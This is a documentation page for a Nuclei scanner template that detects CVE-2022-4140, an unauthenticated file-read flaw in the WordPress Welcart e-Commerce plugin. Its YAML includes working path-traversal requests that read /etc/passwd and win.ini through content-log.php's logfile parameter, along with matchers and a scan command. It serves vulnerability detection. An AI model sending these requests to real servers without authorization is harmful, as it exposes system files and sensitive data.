Skip to content
Nuclei Templates

WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access

ID: CVE-2022-4140

Severity: high

Author: theamanrawat

Tags: cve,cve2022,usc-e-shop,wpscan,wp-plugin,wp,wordpress,lfi,unauthenticated,collne

Description

Section titled “Description”

WordPress Welcart e-Commerce plugin before 2.8.5 is susceptible to arbitrary file access. The plugin does not validate user input before using it to output the content of a file, which can allow an attacker to read arbitrary files on the server, obtain sensitive information, modify data, and/or execute unauthorized operations.

YAML Source

Section titled “YAML Source”
id: CVE-2022-4140


info:
  name: WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access
  author: theamanrawat
  severity: high
  description: |
    WordPress Welcart e-Commerce plugin before 2.8.5 is susceptible to arbitrary file access. The plugin does not validate user input before using it to output the content of a file, which can allow an attacker to read arbitrary files on the server, obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can access sensitive files on the server, potentially exposing sensitive information.
  remediation: Fixed in version 2.8.5.
  reference:
    - https://wpscan.com/vulnerability/0d649a7e-3334-48f7-abca-fff0856e12c7
    - https://wordpress.org/plugins/usc-e-shop/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4140
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-4140
    cwe-id: CWE-552
    epss-score: 0.00932
    epss-percentile: 0.82572
    cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: collne
    product: welcart_e-commerce
    framework: wordpress
  tags: cve,cve2022,usc-e-shop,wpscan,wp-plugin,wp,wordpress,lfi,unauthenticated,collne


http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd"
      - "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini"


    stop-at-first-match: true


    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"


      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or


      - type: status
        status:
          - 200
# digest: 4a0a0047304502204962ba1d2a00af10bb443fdbd2ed90d56582a37c919188b444fc07e954614f66022100abede3fc01709b08ab962f1f71f4d32ca873067460d2ff6fe9a7a6f7c8b4367e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-4140.yaml"

View on Github